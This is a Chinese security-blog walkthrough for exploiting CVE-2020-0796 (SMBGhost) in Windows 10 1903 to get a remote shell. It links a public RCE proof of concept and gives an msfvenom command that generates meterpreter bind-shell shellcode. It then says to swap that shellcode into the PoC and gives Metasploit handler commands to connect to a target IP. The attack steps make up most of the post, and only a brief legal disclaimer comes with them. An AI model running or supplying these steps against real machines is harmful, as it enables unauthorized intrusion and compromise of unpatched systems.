会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。

---- 网易云热评

本篇内容来自雷石安全实验室。

一、漏洞描述:

该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。

 

二、测试环境及工具:

windows10 1903 64位下载:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

CVE-2020-0796 "poc"下载:

https://github.com/chompie1337/SMBGhost_RCE_PoC

 

三、漏洞利用

1、生成反向连接木马:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

2、替换POC,将上面生成的代码替换原文中的代码

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

 

3、启动Metasploit监听

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 4444

set rhost 192.168.1.143  目标主机

run

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

3、运行poc,自动建立连接

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

 

相关文章:

  • 2021-09-20
  • 2021-11-13
  • 2020-06-03
  • 2021-07-23
  • 2021-10-30
  • 2021-05-07
  • 2021-07-27
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2021-10-05
  • 2020-10-23
  • 2020-12-30
  • 2022-01-12
  • 2021-09-29
相关资源
相似解决方案